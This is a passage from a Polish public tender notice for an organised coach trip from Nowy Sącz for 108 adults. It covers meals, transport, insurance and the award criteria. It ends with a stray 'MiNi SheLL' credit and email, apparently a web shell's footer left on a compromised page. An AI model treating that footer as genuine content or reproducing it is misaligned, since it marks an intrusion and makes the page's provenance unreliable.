Program: Wykonawca przygotuje program autorski, w zakresie organizacji wycieczki, który dołączy do oferty. W programie należy uwzględnić biesiadę przy muzyce mechanicznej dla uczestników.
Wyżywienie: 
-	1 x śniadania w restauracji hotelowej ( bufet szwedzki)
-	2 x obiady serwowane 
-	1 x menu podczas imprezy integracyjnej
Wykonawca opisze szczegółowo menu podczas wycieczki oraz biesiady.
Transport:  2 autokary wysokopokładowe  klasy LUX (max. 5 letni) wyposażony w klimatyzację, wc, dvd. Wykonawca zobowiązuje się do zapewnienia autokaru zastępczego na wypadek awarii. Wyjazd/Przyjazd Nowy Sącz.
Ubezpieczenie: NNW
Inne: obsługa pilota, przewodników w zwiedzanych miejscowościach i obiektach, opłaty drogowe, autostradowe,  ewentualne taksy klimatyczne parkingowe, bilety wstępów do zwiedzanych obiektów.
Ilość uczestników: 108 osób dorosłych płatnych + 2 miejsca gratis (po 1 miejscu w autokarze)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Atrakcyjność programu - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com